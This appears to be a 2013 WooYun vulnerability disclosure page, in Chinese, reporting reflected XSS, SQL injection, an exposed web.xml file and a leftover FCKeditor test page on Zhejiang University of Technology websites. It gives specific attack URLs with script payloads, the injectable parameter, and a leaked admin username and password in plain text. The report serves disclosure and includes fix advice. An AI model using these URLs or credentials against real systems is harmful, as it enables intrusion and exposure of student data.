当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-037318

漏洞标题:浙江工业大学漏洞礼包(sql注入等)

相关厂商:zjut.edu.cn

漏洞作者: Wenien

提交时间:2013-09-17 10:47

修复时间:2013-09-22 10:47

公开时间:2013-09-22 10:47

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:19

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-17: 细节已通知厂商并且等待厂商处理中
2013-09-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

看到wooyun问题厂商惊现“浙江工业大学”,就做个小检测吧。

详细说明:

XSS很多,列举不来。随便说说:
http://www.gs.zjut.edu.cn/zsxx/gatzs.asp?sclass=6<script>alert(1)</script>
(有检测非法字符,但是还是弹出了)
http://www.zjut.edu.cn/zjutsso/ForZjutnewsLogin.jsp?goToUrl=/zjutnews/newsDetail.jsp?id=8216"><script>alert(1)</script><a"
(这个弹得不错)
下面是文件信息:
http://www.zjut.edu.cn/zjutnews/WEB-INF/web.xml
下面是注入:
http://www.rsc.zjut.edu.cn/Person-detail.asp?id=1599 SQL注入
(账号:admin 密码:87317751 请校方及时更改密码和修补注入问题,还有,管理入口请隐藏着,不要对外,开始猜解后台都没对,后来发现了这个。)

22.png


下面是样例文件未删除:
http://www.zjut.edu.cn/FCKeditor/editor/filemanager/connectors/test.html

漏洞证明:

web.xml

12.png


管理登陆:

33.png


进入后:

44.png


测试文件:

12.png


后期,我没有进一步深入去深入检测,校方应该多注意学校的信息安全问题。这些东西只是个别案例,相信学校的其他网站也有不少的安全漏洞。

修复方案:

1、XSS 过滤关键字,增加实体转义。
2、SQL 过滤
3、样例文件删除或者重定向
希望校方重视网络信息安全,因为很多学生的信息都在学校里面,学生的很多资料如账号密码,手机号码家庭地址等信息都会因为校方一不留神的网络安全问题而泄露。
校方还可以多打赏我 1 个 rank,谢谢。

版权声明:转载请注明来源 Wenien@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-09-22 10:47

厂商回复:

最新状态:

暂无